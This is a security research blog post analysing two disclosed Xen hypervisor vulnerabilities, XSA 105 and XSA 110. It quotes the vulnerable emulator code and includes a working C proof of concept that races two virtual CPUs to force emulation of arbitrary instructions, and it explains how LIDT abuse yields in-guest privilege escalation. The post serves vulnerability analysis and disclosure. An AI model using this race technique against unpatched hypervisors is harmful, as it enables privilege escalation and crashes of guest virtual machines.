The Dangers of x86 Emulation: Xen XSA 110 and 105

Felix Wilhelm


Developing a secure and feature-rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: XSA 110 and XSA 105. Both bugs show that the attack surface of hypervisors is often larger than expected. XSA 105 was originally reported by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions, including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate privileges within the guest. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating far jumps, calls, and returns.

Readers interested in virtualization technology might wonder why an HVM hypervisor contains an instruction emulator at all: one of the advantages of hardware-assisted virtualization is the ability to execute privileged instructions natively and securely. While this is true in general, emulation is still needed for some special cases:

Instructions accessing memory-mapped IO space.
VMs running in real mode: due to restrictions of earlier Intel VMX versions, many popular hypervisors emulate VM code running in real mode.
Instructions that are not yet implemented by the physical hardware.

In practice, all mainstream hypervisors include at least basic emulation support, of widely varying quality.

While memory corruption flaws in the emulator code could allow a complete hypervisor breakout, logic bugs involving incorrectly emulated instructions are much more common. In the worst case, these bugs can result in privilege escalation vulnerabilities inside the guest VM, as is the case for XSA 105. As mentioned in the advisory, the bug is caused by missing privilege checks for certain special instructions. In order to exploit this bug for privilege escalation, we need a way to trigger the emulation of arbitrary instructions as a normal user inside a VM.

Emulating Arbitrary Instructions

Fortunately, emulation of arbitrary instructions can easily be triggered on guests with multiple virtual CPUs, as described by Andrei Lutas in his whitepaper:

First, we raise a #UD exception on one of the CPUs by executing an invalid opcode. This triggers a VM exit, which is handled by the main VM exit handler. For Intel CPUs, this handler is the vmx_vmexit_handler function defined in x86/hvm/vmx/vmx.c:

void vmx_vmexit_handler(struct cpu_user_regs *regs) {
    …
    switch ( exit_reason ) {
    …
    case TRAP_invalid_op:
        HVMTRACE_1D(TRAP, vector);
        vmx_vmexit_ud_intercept(regs);
        break;
    …
    }
    …
}

While the complete exit handler is quite complex, at its core it is just a big switch statement on the VMX exit reason. In the case of a #UD exception, the vmx_vmexit_ud_intercept function is called:

static void vmx_vmexit_ud_intercept(struct cpu_user_regs *regs) {
    struct hvm_emulate_ctxt ctxt;
    int rc;

    hvm_emulate_prepare(&ctxt, regs);
    rc = hvm_emulate_one(&ctxt);
    ...
}

As we can see, the function is a small wrapper around hvm_emulate_one, which in turn calls into the x86_emulate function defined in x86/x86_emulate/x86_emulate.c for the actual emulation.
One interesting aspect for us is that x86_emulate fetches the bytes to be emulated directly from guest memory. This means that there is a race window between the moment the #UD exception is raised and the moment x86_emulate fetches the instruction bytes. If we use a second virtual CPU to replace the originally invalid opcode during this window, we can force the emulation of arbitrary instructions. While winning this race reliably is quite hard, even a small chance of winning is sufficient for our use case. The code snippet below shows a minimal sample that triggers emulation of a far return using this technique:

 
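#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/mman.h>
#include <unistd.h>

// Linux/x86-64 guest, build with: gcc -pthread
// The inline assembly uses RIP-relative addressing, so PIE builds link too.

// Barrier counter shared by both threads (only accessed from inline assembly)
long barrier = 0;

void *thread_one(void *x) {
    (void)x;
    __asm__ volatile(".intel_syntax noprefix\n"
            ".code64\n"
            // Overwrite the far return at "trigger" with UD2 (0F 0B)
            "mov byte ptr [rip + trigger], 0x0F\n"
            "mov byte ptr [rip + trigger + 1], 0x0B\n"
            // Arrive at the barrier
            "lea rax, [rip + barrier]\n"
            "lock inc qword ptr [rax]\n"
            "spin_one:\n"
            // Wait until thread_two arrives at the barrier as well
            "cmp qword ptr [rax], 2\n"
            "jnz spin_one\n"
            "trigger:\n"
            // Assembled as "rex64 retf" (48 CB) but patched to UD2 above,
            // so executing it raises #UD unless thread_two was faster
            "rex64 retf\n"
            ".att_syntax prefix\n"
            ::: "rax", "memory", "cc");
    return NULL;
}

void *thread_two(void *x) {
    (void)x;
    __asm__ volatile(".intel_syntax noprefix\n"
            ".code64\n"
            // Arrive at the barrier and wait for thread_one
            "lea rax, [rip + barrier]\n"
            "lock inc qword ptr [rax]\n"
            "spin_two:\n"
            "cmp qword ptr [rax], 2\n"
            "jnz spin_two\n"
            // Restore the far return (48 CB). If these writes land after
            // thread_one raised #UD but before the hypervisor fetched the
            // instruction bytes, the far return is emulated instead of UD2.
            "mov byte ptr [rip + trigger], 0x48\n"
            "mov byte ptr [rip + trigger + 1], 0xCB\n"
            ".att_syntax prefix\n"
            ::: "rax", "memory", "cc");
    return NULL;
}

void doStuff(void)
{
    // Initialize and start both threads; each run is one attempt at the race.
    pthread_t h1, h2;
    pthread_create(&h1, NULL, thread_one, NULL);
    pthread_create(&h2, NULL, thread_two, NULL);
    pthread_join(h1, NULL);
    pthread_join(h2, NULL);
}

int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;
    // We have to make the code of thread_one writable in order to enable
    // patching of the instruction. Simply mprotecting the whole page is the
    // easiest way to do this (assuming "trigger" lies on the same page).
    long page_size = sysconf(_SC_PAGESIZE);
    uintptr_t address = (uintptr_t) thread_one;
    void *page = (void *) (address & ~(uintptr_t) (page_size - 1));
    if (mprotect(page, page_size, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    doStuff();
    return 0;
}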

Of course, without bugs in the emulator code this ability is not very interesting in itself. Besides classic low-level issues like memory corruption, there are two features of an emulator that can be an interesting source of security vulnerabilities:

Guest Memory Access: Most emulated instructions access VM memory either directly or indirectly. During normal operation, memory access checks are performed automatically by the hardware. When emulating, however, all of these checks have to be performed by the hypervisor itself. The low-level nature of this code, as well as the high complexity of the x86 architecture, makes this work quite error-prone.
Privileged Instructions: Several x86 instructions may only be executed in ring 0. These include instructions that manipulate control or system registers, instructions that load the descriptor table registers (such as LGDT and LIDT), and even simple ones like “HLT”, which halts the CPU.

Xen XSA 105

Xen XSA 105 is a fairly simple example of the second bug type. Looking at the implementation of the wrmsr instruction inside the Xen emulator, we can see that the instruction is only emulated when the caller is in ring 0:

case 0x30: /* wrmsr */ {
    uint64_t val = ((uint64_t)_regs.edx << 32) | (uint32_t)_regs.eax;
    generate_exception_if(!mode_ring0(), EXC_GP, 0);
    fail_if(ops->write_msr == NULL);
    if ( (rc = ops->write_msr((uint32_t)_regs.ecx, val, ctxt)) != 0 )
        goto done;
    break;
}

However, this check is missing for several other instructions, including HLT, LIDT and LGDT:

case 0xf4: /* hlt */
    ctxt->retire.flags.hlt = 1;
    break;
…
case 2: /* lgdt */
case 3: /* lidt */
    generate_exception_if(ea.type != OP_MEM, EXC_UD, -1);
    fail_if(ops->write_segment == NULL);
    memset(&reg, 0, sizeof(reg));
    if ( (rc = read_ulong(ea.mem.seg, ea.mem.off+0, &limit, 2, ctxt, ops)) ||
         (rc = read_ulong(ea.mem.seg, ea.mem.off+2, &base, mode_64bit() ? 8 : 4, ctxt, ops)) )
        goto done;
    reg.base = base;
    reg.limit = limit;
    if ( op_bytes == 2 )
        reg.base &= 0xffffff;
    if ( (rc = ops->write_segment((modrm_reg & 1) ? x86_seg_idtr : x86_seg_gdtr, &reg, ctxt)) )
        goto done;
    break;

Because LIDT loads the IDT register, which points to the Interrupt Descriptor Table holding the handlers for all hardware and software interrupts, an attacker can redirect every interrupt to code of their choosing, which makes privilege escalation easy. The whitepaper by Andrei Lutas mentioned earlier describes the exploitation process on Windows in detail.
The patch for XSA 105 is as simple as the bug: it adds ring 0 checks in front of all affected privileged instructions.

Xen XSA 110

The second recent bug involving the Xen emulator is XSA 110, which was discovered by Jan Beulich from SUSE. The x86 architecture provides far branch instructions that jump to a new address while simultaneously loading a new value into the code segment selector. In order to understand the details of this vulnerability, a bit of background about the role of segment selectors on modern operating systems is needed:

When we talk about ring 0 or ring 3, we are actually talking about the “Current Privilege Level” (CPL) of the currently executing code. The CPL is encoded in the two lowest bits of the CS segment selector and cannot be changed by normal means: the CS register cannot be written directly, and the instructions that change its value ensure that a switch to ring 0 is only possible under special, predefined circumstances. Besides enabling and disabling access to privileged instructions, the CPL is used whenever memory is accessed. The “Descriptor Privilege Level” (DPL) of a memory segment, encoded in its segment descriptor, restricts access to code executing with a CPL numerically smaller than or equal to the DPL.

The issue patched with XSA 110 is that the checks performed by the Xen emulator when changing the value of the CS register are much weaker than they should be. The following code is part of the vulnerable function protmode_load_seg, defined in x86/x86_emulate/x86_emulate.c:

    dpl = (desc.b >> 13) & 3;
    rpl = sel & 3;
    cpl = ss.attr.fields.dpl;

    switch ( seg )
    {
    case x86_seg_cs:
        /* Code segment? */
        if ( !(desc.b & (1u<<11)) )
            goto raise_exn;
        /* Non-conforming segment: check DPL against RPL. */
        if ( ((desc.b & (6u<<9)) != (6u<<9)) && (dpl != rpl) )
            goto raise_exn;
        break;

protmode_load_seg is indirectly called by the emulation routines of all far branch instructions (RETF, CALL and JMP). Its purpose is to change the value of a segment selector register after validating the new value. However, the unpatched version does not perform sufficient checks.
An attacker wanting to escalate privileges on an x86-64 Linux system would choose the CS selector value 0x10, which is the code segment selector used by the Linux kernel. In this case, the variables rpl and dpl in the listing above would both be 0, while the current CPL would still be 3. Because the code segment case never consults the current CPL, the check passes and the far branch is emulated.
We originally thought this bug would be sufficient for privilege escalation, but this does not seem to be the case, due to an interesting and lesser-known property of the Intel x86 architecture: while the CPL is always stored in the lowest bits of the CS selector, there is a hard requirement that the same value is also stored in the DPL field of the stack segment (SS). Because the emulator does not take this requirement into account, an exploit targeting this vulnerability results in a crash of the virtual machine. A normal user should not be able to trigger this either, but it is a significantly less interesting bug.

Summary

Xen XSA 105 and XSA 110 are two bugs involving the Xen x86 emulation code. Both can be used by an unprivileged user to crash a virtual machine, and XSA 105 even allows privilege escalation independent of vulnerabilities in the virtualized operating system. Bugs like these show that hypervisors are often not as hardened as many people assume, and that every additional software layer introduces additional bugs. Full exploit code for Xen XSA 105 will be presented during the Exploiting Hypervisors Workshop at Troopers 15 and will be released publicly some time after that.
